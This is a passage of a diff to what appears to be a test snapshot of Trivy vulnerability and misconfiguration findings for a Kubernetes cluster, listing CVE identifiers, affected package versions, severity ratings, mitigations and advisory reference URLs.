"type": "URL", + "value": "https://www.cve.org/CVERecord?id=CVE-2022-37434", + }, + { + "type": "URL", + "value": "https://www.debian.org/security/2022/dsa-5218", }, ], "severity": "HIGH", }, { "attributes": { - "fixedVersion": "2.2.8", - "foundIn": "Target: 'usr/local/bin/local-path-provisioner' / Class: 'lang-pkgs' / Type: 'gobinary'", - "id": "CVE-2019-11254", - "installedVersion": "v2.2.4", - "packageName": "gopkg.in/yaml.v2", + "fixedVersion": "1.2.12-r0", + "foundIn": "Target: 'docker.io/rancher/local-path-provisioner:v0.0.14 (alpine 3.12.0)' / Class: 'os-pkgs' / Type: 'alpine'", + "id": "CVE-2018-25032", + "installedVersion": "1.2.11-r3", + "packageName": "zlib", "references": [ - "https://access.redhat.com/security/cve/CVE-2019-11254", - "https://bugs.chromium.org/p/oss-fuzz/issues/detail?id=18496", - "https://github.com/advisories/GHSA-wxc4-f4m6-wwqv", - "https://github.com/go-yaml/yaml/commit/53403b58ad1b561927d19068c655246f2db79d48", - "https://github.com/go-yaml/yaml/pull/555", - "https://github.com/kubernetes/kubernetes/issues/89535", - "https://github.com/kubernetes/kubernetes/pull/87467/commits/b86df2bec4f377afc0ca03482ffad2f0a49a83b8", - "https://groups.google.com/d/msg/kubernetes-announce/ALL9s73E5ck/4yHe8J-PBAAJ", - "https://groups.google.com/forum/#!topic/kubernetes-security-announce/wuwEwZigXBc", - "https://linux.oracle.com/cve/CVE-2019-11254.html", - "https://linux.oracle.com/errata/ELSA-2020-5653.html", - "https://nvd.nist.gov/vuln/detail/CVE-2019-11254", - "https://pkg.go.dev/vuln/GO-2020-0036", - "https://security.netapp.com/advisory/ntap-20200413-0003/", - "https://www.cve.org/CVERecord?id=CVE-2019-11254", + "http://seclists.org/fulldisclosure/2022/May/33", + "http://seclists.org/fulldisclosure/2022/May/35", + "http://seclists.org/fulldisclosure/2022/May/38", + "http://www.openwall.com/lists/oss-security/2022/03/25/2", + "http://www.openwall.com/lists/oss-security/2022/03/26/1", + "https://access.redhat.com/errata/RHSA-2022:8420", + "https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2018-25032.json", + "https://access.redhat.com/security/cve/CVE-2018-25032", + "https://bugzilla.redhat.com/2067945", + "https://cert-portal.siemens.com/productcert/pdf/ssa-333517.pdf", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-25032", + "https://errata.almalinux.org/9/ALSA-2022-8420.html", + "https://github.com/madler/zlib/commit/5c44459c3b28a9bd3283aaceab7c615f8020c531", + "https://github.com/madler/zlib/compare/v1.2.11...v1.2.12", + "https://github.com/madler/zlib/issues/605", + "https://github.com/sparklemotion/nokogiri/releases/tag/v1.13.4", + "https://github.com/sparklemotion/nokogiri/security/advisories/GHSA-v6gp-9mmm-c6p5", + "https://groups.google.com/g/ruby-security-ann/c/vX7qSjsvWis/m/TJWN4oOKBwAJ", + "https://linux.oracle.com/cve/CVE-2018-25032.html", + "https://linux.oracle.com/errata/ELSA-2022-9565.html", + "https://lists.debian.org/debian-lts-announce/2022/04/msg00000.html", + "https://lists.debian.org/debian-lts-announce/2022/05/msg00008.html", + "https://lists.debian.org/debian-lts-announce/2022/09/msg00023.html", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/DCZFIJBJTZ7CL5QXBFKTQ22Q26VINRUF/", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/DF62MVMH3QUGMBDCB3DY2ERQ6EBHTADB/", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/JZZPTWRYQULAOL3AW7RZJNVZ2UONXCV4/", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/NS2D2GFPFGOJUL4WQ3DUAY7HF4VWQ77F/", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/VOKNP2L734AEL47NRYGVZIKEFOUBQY5Y/", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/XOKFMSNQ5D5WGMALBNBXU3GE442V74WU/", + "https://nvd.nist.gov/vuln/detail/CVE-2018-25032", + "https://security.gentoo.org/glsa/202210-42", + "https://security.netapp.com/advisory/ntap-20220526-0009/", + "https://security.netapp.com/advisory/ntap-20220729-0004/", + "https://support.apple.com/kb/HT213255", + "https://support.apple.com/kb/HT213256", + "https://support.apple.com/kb/HT213257", + "https://ubuntu.com/security/notices/USN-5355-1", + "https://ubuntu.com/security/notices/USN-5355-2", + "https://ubuntu.com/security/notices/USN-5359-1", + "https://ubuntu.com/security/notices/USN-5359-2", + "https://ubuntu.com/security/notices/USN-5739-1", + "https://www.cve.org/CVERecord?id=CVE-2018-25032", + "https://www.debian.org/security/2022/dsa-5111", + "https://www.openwall.com/lists/oss-security/2022/03/24/1", + "https://www.openwall.com/lists/oss-security/2022/03/28/1", + "https://www.openwall.com/lists/oss-security/2022/03/28/3", + "https://www.oracle.com/security-alerts/cpujul2022.html", ], }, "category": "Vulnerability", - "description": "The Kubernetes API Server component in versions 1.1-1.14, and versions prior to 1.15.10, 1.16.7 and 1.17.3 allows an authorized user who sends malicious YAML payloads to cause the kube-apiserver to consume excessive CPU cycles while parsing YAML.", + "description": "zlib before 1.2.12 allows memory corruption when deflating (i.e., when compressing) if the input has many distant matches.", "location": "scb://trivy/?Namespace=local-path-storage&Kind=Deployment&Name=local-path-provisioner", "mitigation": undefined, - "name": "kubernetes: Denial of service in API server via crafted YAML payloads by authorized users", + "name": "A flaw found in zlib when compressing (not decompressing) certain inputs", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2019-11254", + "value": "https://avd.aquasec.com/nvd/cve-2018-25032", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2019-11254", + "value": "http://seclists.org/fulldisclosure/2022/May/33", }, { "type": "URL", - "value": "https://bugs.chromium.org/p/oss-fuzz/issues/detail?id=18496", + "value": "http://seclists.org/fulldisclosure/2022/May/35", }, { "type": "URL", - "value": "https://github.com/advisories/GHSA-wxc4-f4m6-wwqv", + "value": "http://seclists.org/fulldisclosure/2022/May/38", }, { "type": "URL", - "value": "https://github.com/go-yaml/yaml/commit/53403b58ad1b561927d19068c655246f2db79d48", + "value": "http://www.openwall.com/lists/oss-security/2022/03/25/2", }, { "type": "URL", - "value": "https://github.com/go-yaml/yaml/pull/555", + "value": "http://www.openwall.com/lists/oss-security/2022/03/26/1", }, { "type": "URL", - "value": "https://github.com/kubernetes/kubernetes/issues/89535", + "value": "https://access.redhat.com/errata/RHSA-2022:8420", }, { "type": "URL", - "value": "https://github.com/kubernetes/kubernetes/pull/87467/commits/b86df2bec4f377afc0ca03482ffad2f0a49a83b8", + "value": "https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2018-25032.json", }, { "type": "URL", - "value": "https://groups.google.com/d/msg/kubernetes-announce/ALL9s73E5ck/4yHe8J-PBAAJ", + "value": "https://access.redhat.com/security/cve/CVE-2018-25032", }, { "type": "URL", - "value": "https://groups.google.com/forum/#!topic/kubernetes-security-announce/wuwEwZigXBc", + "value": "https://bugzilla.redhat.com/2067945", }, { "type": "URL", - "value": "https://linux.oracle.com/cve/CVE-2019-11254.html", + "value": "https://cert-portal.siemens.com/productcert/pdf/ssa-333517.pdf", }, { "type": "URL", - "value": "https://linux.oracle.com/errata/ELSA-2020-5653.html", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-25032", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2019-11254", + "value": "https://errata.almalinux.org/9/ALSA-2022-8420.html", }, { "type": "URL", - "value": "https://pkg.go.dev/vuln/GO-2020-0036", + "value": "https://github.com/madler/zlib/commit/5c44459c3b28a9bd3283aaceab7c615f8020c531", }, { "type": "URL", - "value": "https://security.netapp.com/advisory/ntap-20200413-0003/", + "value": "https://github.com/madler/zlib/compare/v1.2.11...v1.2.12", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2019-11254", + "value": "https://github.com/madler/zlib/issues/605", }, - ], - "severity": "MEDIUM", - }, - { - "attributes": { - "fixedVersion": "0.20.0-alpha.2", - "foundIn": "Target: 'usr/local/bin/local-path-provisioner' / Class: 'lang-pkgs' / Type: 'gobinary'", - "id": "CVE-2020-8565", - "installedVersion": "v0.17.1", - "packageName": "k8s.io/client-go", - "references": [ - "https://access.redhat.com/security/cve/CVE-2020-8565", - "https://github.com/advisories/GHSA-8cfg-vx93-jvxw", - "https://github.com/kubernetes/kubernetes/commit/e99df0e5a75eb6e86123b56d53e9b7ca0fd00419", - "https://github.com/kubernetes/kubernetes/issues/95623", - "https://github.com/kubernetes/kubernetes/pull/95316", - "https://groups.google.com/g/kubernetes-announce/c/ScdmyORnPDk", - "https://groups.google.com/g/kubernetes-security-discuss/c/vm-HcrFUOCs/m/36utxAM5CwAJ", - "https://nvd.nist.gov/vuln/detail/CVE-2020-8565", - "https://pkg.go.dev/vuln/GO-2021-0064", - "https://www.cve.org/CVERecord?id=CVE-2020-8565", - ], - }, - "category": "Vulnerability", - "description": "In Kubernetes, if the logging level is set to at least 9, authorization and bearer tokens will be written to log files. This can occur both in API server logs and client tool output like kubectl. This affects <= v1.19.3, <= v1.18.10, <= v1.17.13, < v1.20.0-alpha2.", - "location": "scb://trivy/?Namespace=local-path-storage&Kind=Deployment&Name=local-path-provisioner", - "mitigation": undefined, - "name": "kubernetes: Incomplete fix for CVE-2019-11250 allows for token leak in logs when logLevel >= 9", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2020-8565", + "value": "https://github.com/sparklemotion/nokogiri/releases/tag/v1.13.4", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2020-8565", + "value": "https://github.com/sparklemotion/nokogiri/security/advisories/GHSA-v6gp-9mmm-c6p5", }, { "type": "URL", - "value": "https://github.com/advisories/GHSA-8cfg-vx93-jvxw", + "value": "https://groups.google.com/g/ruby-security-ann/c/vX7qSjsvWis/m/TJWN4oOKBwAJ", }, { "type": "URL", - "value": "https://github.com/kubernetes/kubernetes/commit/e99df0e5a75eb6e86123b56d53e9b7ca0fd00419", + "value": "https://linux.oracle.com/cve/CVE-2018-25032.html", }, { "type": "URL", - "value": "https://github.com/kubernetes/kubernetes/issues/95623", + "value": "https://linux.oracle.com/errata/ELSA-2022-9565.html", }, { "type": "URL", - "value": "https://github.com/kubernetes/kubernetes/pull/95316", + "value": "https://lists.debian.org/debian-lts-announce/2022/04/msg00000.html", }, { "type": "URL", - "value": "https://groups.google.com/g/kubernetes-announce/c/ScdmyORnPDk", + "value": "https://lists.debian.org/debian-lts-announce/2022/05/msg00008.html", }, { "type": "URL", - "value": "https://groups.google.com/g/kubernetes-security-discuss/c/vm-HcrFUOCs/m/36utxAM5CwAJ", + "value": "https://lists.debian.org/debian-lts-announce/2022/09/msg00023.html", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2020-8565", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/DCZFIJBJTZ7CL5QXBFKTQ22Q26VINRUF/", }, { "type": "URL", - "value": "https://pkg.go.dev/vuln/GO-2021-0064", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/DF62MVMH3QUGMBDCB3DY2ERQ6EBHTADB/", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2020-8565", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/JZZPTWRYQULAOL3AW7RZJNVZ2UONXCV4/", + }, + { + "type": "URL", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/NS2D2GFPFGOJUL4WQ3DUAY7HF4VWQ77F/", + }, + { + "type": "URL", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/VOKNP2L734AEL47NRYGVZIKEFOUBQY5Y/", + }, + { + "type": "URL", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/XOKFMSNQ5D5WGMALBNBXU3GE442V74WU/", + }, + { + "type": "URL", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2018-25032", + }, + { + "type": "URL", + "value": "https://security.gentoo.org/glsa/202210-42", + }, + { + "type": "URL", + "value": "https://security.netapp.com/advisory/ntap-20220526-0009/", + }, + { + "type": "URL", + "value": "https://security.netapp.com/advisory/ntap-20220729-0004/", + }, + { + "type": "URL", + "value": "https://support.apple.com/kb/HT213255", + }, + { + "type": "URL", + "value": "https://support.apple.com/kb/HT213256", + }, + { + "type": "URL", + "value": "https://support.apple.com/kb/HT213257", + }, + { + "type": "URL", + "value": "https://ubuntu.com/security/notices/USN-5355-1", + }, + { + "type": "URL", + "value": "https://ubuntu.com/security/notices/USN-5355-2", + }, + { + "type": "URL", + "value": "https://ubuntu.com/security/notices/USN-5359-1", + }, + { + "type": "URL", + "value": "https://ubuntu.com/security/notices/USN-5359-2", + }, + { + "type": "URL", + "value": "https://ubuntu.com/security/notices/USN-5739-1", + }, + { + "type": "URL", + "value": "https://www.cve.org/CVERecord?id=CVE-2018-25032", + }, + { + "type": "URL", + "value": "https://www.debian.org/security/2022/dsa-5111", + }, + { + "type": "URL", + "value": "https://www.openwall.com/lists/oss-security/2022/03/24/1", + }, + { + "type": "URL", + "value": "https://www.openwall.com/lists/oss-security/2022/03/28/1", + }, + { + "type": "URL", + "value": "https://www.openwall.com/lists/oss-security/2022/03/28/3", + }, + { + "type": "URL", + "value": "https://www.oracle.com/security-alerts/cpujul2022.html", }, ], - "severity": "MEDIUM", + "severity": "HIGH", }, { "attributes": { @@ -53008,704 +53098,781 @@ commonly used by applications.", }, { "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'Pod/kube-scheduler-kind-control-plane' / Class: 'config' / Type: 'kubernetes'", - "id": "KCV0040", - "installedVersion": undefined, - "packageName": undefined, + "fixedVersion": "2.16.0+incompatible", + "foundIn": "Target: 'metrics-sidecar' / Class: 'lang-pkgs' / Type: 'gobinary'", + "id": "CVE-2022-1996", + "installedVersion": "v2.15.0+incompatible", + "packageName": "github.com/emicklei/go-restful", "references": [ - "https://www.cisecurity.org/benchmark/kubernetes", - "https://avd.aquasec.com/misconfig/kcv0040", + "https://access.redhat.com/security/cve/CVE-2022-1996", + "https://github.com/advisories/GHSA-r48q-9g5r-8q2h", + "https://github.com/emicklei/go-restful/commit/926662532deb450272956c7bc573978464aae74e", + "https://github.com/emicklei/go-restful/commit/f292efff46ae17e9d104f865a60a39a2ae9402f1", + "https://github.com/emicklei/go-restful/commit/fd3c327a379ce08c68ef18765bdc925f5d9bad10", + "https://github.com/emicklei/go-restful/issues/489", + "https://huntr.dev/bounties/be837427-415c-4d8c-808b-62ce20aa84f1", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/575BLJ3Y2EQBRNTFR2OSQQ6L2W6UCST3/", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/OBDD3Q23RCGAGHIXUCWBU6N3S4RNAKXB/", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/RQXU752ALW53OJAF5MG3WMR5CCZVLWW6/", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/SO5QC2JFW2PXBWAE27OYYYL5SPFUBHTY/", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/W56PP46JVZEKCANBKXFKRVSBBRRMCY6V/", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/Z55VUVGO7E5PJFXIOVAY373NZRHBNCI5/", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/ZGQKWD6SE75PFBPFVSZYAKAVXKBZXKWS/", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/ZY2SLWOQR4ZURQ7UBRZ7JIX6H6F5JHJR/", + "https://nvd.nist.gov/vuln/detail/CVE-2022-1996", + "https://pkg.go.dev/vuln/GO-2022-0619", + "https://security.netapp.com/advisory/ntap-20220923-0005/", + "https://www.cve.org/CVERecord?id=CVE-2022-1996", ], }, - "category": "Misconfiguration", - "description": "Disable profiling, if not needed.", - "location": "scb://trivy/?Namespace=kube-system&Kind=Pod&Name=kube-scheduler-kind-control-plane", - "mitigation": "Edit the Scheduler pod specification file /etc/kubernetes/manifests/kube-scheduler.yaml file on the Control Plane node and set the below parameter.", - "name": "Ensure that the --profiling argument is set to false(Ensure that the --profiling argument is set to false)", + "category": "Vulnerability", + "description": "Authorization Bypass Through User-Controlled Key in GitHub repository emicklei/go-restful prior to v3.8.0.", + "location": "scb://trivy/?Namespace=kubernetes-dashboard&Kind=Deployment&Name=dashboard-metrics-scraper", + "mitigation": undefined, + "name": "Authorization Bypass Through User-Controlled Key", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/misconfig/kcv0040", + "value": "https://avd.aquasec.com/nvd/cve-2022-1996", }, { "type": "URL", - "value": "https://www.cisecurity.org/benchmark/kubernetes", + "value": "https://access.redhat.com/security/cve/CVE-2022-1996", }, - ], - "severity": "LOW", - }, - { - "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'Pod/kube-scheduler-kind-control-plane' / Class: 'config' / Type: 'kubernetes'", - "id": "KSV001", - "installedVersion": undefined, - "packageName": undefined, - "references": [ - "https://kubernetes.io/docs/concepts/security/pod-security-standards/#restricted", - "https://avd.aquasec.com/misconfig/ksv001", - ], - }, - "category": "Misconfiguration", - "description": "A program inside the container can elevate its own privileges and run as root, which might give the program control over the container and node.", - "location": "scb://trivy/?Namespace=kube-system&Kind=Pod&Name=kube-scheduler-kind-control-plane", - "mitigation": "Set 'set containers[].securityContext.allowPrivilegeEscalation' to 'false'.", - "name": "Process can elevate its own privileges(Container 'kube-scheduler' of Pod 'kube-scheduler-kind-control-plane' should set 'securityContext.allowPrivilegeEscalation' to false)", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/misconfig/ksv001", + "value": "https://github.com/advisories/GHSA-r48q-9g5r-8q2h", }, { "type": "URL", - "value": "https://kubernetes.io/docs/concepts/security/pod-security-standards/#restricted", + "value": "https://github.com/emicklei/go-restful/commit/926662532deb450272956c7bc573978464aae74e", }, - ], - "severity": "MEDIUM", - }, - { - "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'Pod/kube-scheduler-kind-control-plane' / Class: 'config' / Type: 'kubernetes'", - "id": "KSV003", - "installedVersion": undefined, - "packageName": undefined, - "references": [ - "https://kubesec.io/basics/containers-securitycontext-capabilities-drop-index-all/", - "https://avd.aquasec.com/misconfig/ksv003", - ], - }, - "category": "Misconfiguration", - "description": "The container should drop all default capabilities and add only those that are needed for its execution.", - "location": "scb://trivy/?Namespace=kube-system&Kind=Pod&Name=kube-scheduler-kind-control-plane", - "mitigation": "Add 'ALL' to containers[].securityContext.capabilities.drop.", - "name": "Default capabilities not dropped(Container 'kube-scheduler' of Pod 'kube-scheduler-kind-control-plane' should add 'ALL' to 'securityContext.capabilities.drop')", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/misconfig/ksv003", + "value": "https://github.com/emicklei/go-restful/commit/f292efff46ae17e9d104f865a60a39a2ae9402f1", }, { "type": "URL", - "value": "https://kubesec.io/basics/containers-securitycontext-capabilities-drop-index-all/", + "value": "https://github.com/emicklei/go-restful/commit/fd3c327a379ce08c68ef18765bdc925f5d9bad10", }, - ], - "severity": "LOW", - }, - { - "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'Pod/kube-scheduler-kind-control-plane' / Class: 'config' / Type: 'kubernetes'", - "id": "KSV009", - "installedVersion": undefined, - "packageName": undefined, - "references": [ - "https://kubernetes.io/docs/concepts/security/pod-security-standards/#baseline", - "https://avd.aquasec.com/misconfig/ksv009", - ], - }, - "category": "Misconfiguration", - "description": "Sharing the host’s network namespace permits processes in the pod to communicate with processes bound to the host’s loopback adapter.", - "location": "scb://trivy/?Namespace=kube-system&Kind=Pod&Name=kube-scheduler-kind-control-plane", - "mitigation": "Do not set 'spec.template.spec.hostNetwork' to true.", - "name": "Access to host network(Pod 'kube-scheduler-kind-control-plane' should not set 'spec.template.spec.hostNetwork' to true)", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/misconfig/ksv009", + "value": "https://github.com/emicklei/go-restful/issues/489", }, { "type": "URL", - "value": "https://kubernetes.io/docs/concepts/security/pod-security-standards/#baseline", + "value": "https://huntr.dev/bounties/be837427-415c-4d8c-808b-62ce20aa84f1", }, - ], - "severity": "HIGH", - }, - { - "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'Pod/kube-scheduler-kind-control-plane' / Class: 'config' / Type: 'kubernetes'", - "id": "KSV011", - "installedVersion": undefined, - "packageName": undefined, - "references": [ - "https://cloud.google.com/blog/products/containers-kubernetes/kubernetes-best-practices-resource-requests-and-limits", - "https://avd.aquasec.com/misconfig/ksv011", - ], - }, - "category": "Misconfiguration", - "description": "Enforcing CPU limits prevents DoS via resource exhaustion.", - "location": "scb://trivy/?Namespace=kube-system&Kind=Pod&Name=kube-scheduler-kind-control-plane", - "mitigation": "Set a limit value under 'containers[].resources.limits.cpu'.", - "name": "CPU not limited(Container 'kube-scheduler' of Pod 'kube-scheduler-kind-control-plane' should set 'resources.limits.cpu')", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/misconfig/ksv011", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/575BLJ3Y2EQBRNTFR2OSQQ6L2W6UCST3/", }, { "type": "URL", - "value": "https://cloud.google.com/blog/products/containers-kubernetes/kubernetes-best-practices-resource-requests-and-limits", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/OBDD3Q23RCGAGHIXUCWBU6N3S4RNAKXB/", }, - ], - "severity": "LOW", - }, - { - "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'Pod/kube-scheduler-kind-control-plane' / Class: 'config' / Type: 'kubernetes'", - "id": "KSV012", - "installedVersion": undefined, - "packageName": undefined, - "references": [ - "https://kubernetes.io/docs/concepts/security/pod-security-standards/#restricted", - "https://avd.aquasec.com/misconfig/ksv012", - ], - }, - "category": "Misconfiguration", - "description": "'runAsNonRoot' forces the running image to run as a non-root user to ensure least privileges.", - "location": "scb://trivy/?Namespace=kube-system&Kind=Pod&Name=kube-scheduler-kind-control-plane", - "mitigation": "Set 'containers[].securityContext.runAsNonRoot' to true.", - "name": "Runs as root user(Container 'kube-scheduler' of Pod 'kube-scheduler-kind-control-plane' should set 'securityContext.runAsNonRoot' to true)", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/misconfig/ksv012", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/RQXU752ALW53OJAF5MG3WMR5CCZVLWW6/", }, { "type": "URL", - "value": "https://kubernetes.io/docs/concepts/security/pod-security-standards/#restricted", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/SO5QC2JFW2PXBWAE27OYYYL5SPFUBHTY/", }, - ], - "severity": "MEDIUM", - }, - { - "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'Pod/kube-scheduler-kind-control-plane' / Class: 'config' / Type: 'kubernetes'", - "id": "KSV014", - "installedVersion": undefined, - "packageName": undefined, - "references": [ - "https://kubesec.io/basics/containers-securitycontext-readonlyrootfilesystem-true/", - "https://avd.aquasec.com/misconfig/ksv014", - ], - }, - "category": "Misconfiguration", - "description": "An immutable root file system prevents applications from writing to their local disk. This can limit intrusions, as attackers will not be able to tamper with the file system or write foreign executables to disk.", - "location": "scb://trivy/?Namespace=kube-system&Kind=Pod&Name=kube-scheduler-kind-control-plane", - "mitigation": "Change 'containers[].securityContext.readOnlyRootFilesystem' to 'true'.", - "name": "Root file system is not read-only(Container 'kube-scheduler' of Pod 'kube-scheduler-kind-control-plane' should set 'securityContext.readOnlyRootFilesystem' to true)", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/misconfig/ksv014", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/W56PP46JVZEKCANBKXFKRVSBBRRMCY6V/", }, { "type": "URL", - "value": "https://kubesec.io/basics/containers-securitycontext-readonlyrootfilesystem-true/", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/Z55VUVGO7E5PJFXIOVAY373NZRHBNCI5/", }, - ], - "severity": "LOW", - }, - { - "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'Pod/kube-scheduler-kind-control-plane' / Class: 'config' / Type: 'kubernetes'", - "id": "KSV016", - "installedVersion": undefined, - "packageName": undefined, - "references": [ - "https://kubesec.io/basics/containers-resources-limits-memory/", - "https://avd.aquasec.com/misconfig/ksv016", - ], - }, - "category": "Misconfiguration", - "description": "When containers have memory requests specified, the scheduler can make better decisions about which nodes to place pods on, and how to deal with resource contention.", - "location": "scb://trivy/?Namespace=kube-system&Kind=Pod&Name=kube-scheduler-kind-control-plane", - "mitigation": "Set 'containers[].resources.requests.memory'.", - "name": "Memory requests not specified(Container 'kube-scheduler' of Pod 'kube-scheduler-kind-control-plane' should set 'resources.requests.memory')", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/misconfig/ksv016", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/ZGQKWD6SE75PFBPFVSZYAKAVXKBZXKWS/", }, { "type": "URL", - "value": "https://kubesec.io/basics/containers-resources-limits-memory/", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/ZY2SLWOQR4ZURQ7UBRZ7JIX6H6F5JHJR/", }, - ], - "severity": "LOW", - }, - { - "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'Pod/kube-scheduler-kind-control-plane' / Class: 'config' / Type: 'kubernetes'", - "id": "KSV018", - "installedVersion": undefined, - "packageName": undefined, - "references": [ - "https://kubesec.io/basics/containers-resources-limits-memory/", - "https://avd.aquasec.com/misconfig/ksv018", - ], - }, - "category": "Misconfiguration", - "description": "Enforcing memory limits prevents DoS via resource exhaustion.", - "location": "scb://trivy/?Namespace=kube-system&Kind=Pod&Name=kube-scheduler-kind-control-plane", - "mitigation": "Set a limit value under 'containers[].resources.limits.memory'.", - "name": "Memory not limited(Container 'kube-scheduler' of Pod 'kube-scheduler-kind-control-plane' should set 'resources.limits.memory')", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/misconfig/ksv018", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2022-1996", }, { "type": "URL", - "value": "https://kubesec.io/basics/containers-resources-limits-memory/", + "value": "https://pkg.go.dev/vuln/GO-2022-0619", }, - ], - "severity": "LOW", - }, - { - "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'Pod/kube-scheduler-kind-control-plane' / Class: 'config' / Type: 'kubernetes'", - "id": "KSV020", - "installedVersion": undefined, - "packageName": undefined, - "references": [ - "https://kubesec.io/basics/containers-securitycontext-runasuser/", - "https://avd.aquasec.com/misconfig/ksv020", - ], - }, - "category": "Misconfiguration", - "description": "Force the container to run with user ID > 10000 to avoid conflicts with the host’s user table.", - "location": "scb://trivy/?Namespace=kube-system&Kind=Pod&Name=kube-scheduler-kind-control-plane", - "mitigation": "Set 'containers[].securityContext.runAsUser' to an integer > 10000.", - "name": "Runs with low user ID(Container 'kube-scheduler' of Pod 'kube-scheduler-kind-control-plane' should set 'securityContext.runAsUser' > 10000)", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/misconfig/ksv020", + "value": "https://security.netapp.com/advisory/ntap-20220923-0005/", }, { "type": "URL", - "value": "https://kubesec.io/basics/containers-securitycontext-runasuser/", + "value": "https://www.cve.org/CVERecord?id=CVE-2022-1996", }, ], - "severity": "LOW", + "severity": "HIGH", }, { "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'Pod/kube-scheduler-kind-control-plane' / Class: 'config' / Type: 'kubernetes'", - "id": "KSV021", - "installedVersion": undefined, - "packageName": undefined, + "fixedVersion": "0.0.0-20220906165146-f3363e06e74c", + "foundIn": "Target: 'metrics-sidecar' / Class: 'lang-pkgs' / Type: 'gobinary'", + "id": "CVE-2022-27664", + "installedVersion": "v0.0.0-20220524220425-1d687d428aca", + "packageName": "golang.org/x/net", "references": [ - "https://kubesec.io/basics/containers-securitycontext-runasuser/", - "https://avd.aquasec.com/misconfig/ksv021", + "https://access.redhat.com/errata/RHSA-2023:2357", + "https://access.redhat.com/security/cve/CVE-2022-27664", + "https://bugzilla.redhat.com/2107371", + "https://bugzilla.redhat.com/2107374", + "https://bugzilla.redhat.com/2107383", + "https://bugzilla.redhat.com/2107386", + "https://bugzilla.redhat.com/2107388", + "https://bugzilla.redhat.com/2113814", + "https://bugzilla.redhat.com/2124669", + "https://bugzilla.redhat.com/2132868", + "https://bugzilla.redhat.com/2132872", + "https://bugzilla.redhat.com/2161274", + "https://bugzilla.redhat.com/show_bug.cgi?id=1913333", + "https://bugzilla.redhat.com/show_bug.cgi?id=1913338", + "https://bugzilla.redhat.com/show_bug.cgi?id=2107371", + "https://bugzilla.redhat.com/show_bug.cgi?id=2107374", + "https://bugzilla.redhat.com/show_bug.cgi?id=2107383", + "https://bugzilla.redhat.com/show_bug.cgi?id=2107386", + "https://bugzilla.redhat.com/show_bug.cgi?id=2107388", + "https://bugzilla.redhat.com/show_bug.cgi?id=2113814", + "https://bugzilla.redhat.com/show_bug.cgi?id=2124669", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-28851", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-28852", + 